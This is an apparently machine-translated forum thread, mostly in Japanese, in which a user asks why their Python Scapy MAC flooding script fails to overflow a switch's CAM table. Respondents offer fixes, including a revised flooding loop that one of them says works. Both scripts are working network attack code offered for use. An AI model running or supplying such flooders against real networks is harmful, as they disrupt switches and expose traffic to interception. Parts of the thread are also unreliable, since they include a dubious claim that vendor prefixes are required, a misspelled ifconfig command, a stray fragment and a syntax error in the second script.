スイッチのカム テーブルを埋めるために Python で小さな Mac フラッド ツールを作成しようとしていますが、魔法を起こすことはできませんか? あなたは私が間違っていることを見ることができますか?
from scapy.all import *
while 1:
dest_mac = RandMAC()
src_mac = RandMAC()
sendp(Ether(src=src_mac, dst=dest_mac)/ARP(op=2, psrc="0.0.0.0", hwsrc=src_mac, hwdst=dest_mac)/Padding(load="X"*18), verbose=0)
コードは正常に動作しているように見えますが、その仕事をしていません。それをテストするために、wireshark を使用してパケットを確認し、THC のパラサイトを実行して「これが機能する」と、パケットはほとんど同じであるため、何が起こっているのかわかりません。助けてくれてありがとう。
You can only use some mac address: a mac address is composed by six groups of two hexadecimal digits, separated by hyphens (-) or colons (:). The first three fields must be filled with some values, different for every vendor. If this fields are not set with any vendor code the server (or the client) will drop the packet. You can find mac vendors list on wireshark manuf file, or simply looking for it with google. You can check the address by typing "sudo ifcofig IFACE ether hw ADDRESS" in the terminal.
えまだ
Mac アドレスは送信元アドレスのみを使用してスイッチによって学習されるため、送信先のランダム化について心配する必要はありません。
私はこれをテストしましたが、うまく機能しているようです.フラッディングのためにsendpfastオプションを試してみることもできますが、ここでのテストではsendpがより速く動作するように見えましたか?
from scapy.all import *
while 1:
sendp(Ether(src=RandMAC(),dst="FF:FF:FF:FF:FF:FF")/ARP(op=2, psrc="0.0.0.0", hwdst="FF:FF:FF:FF:FF:FF")/Padding(load="X"*18)))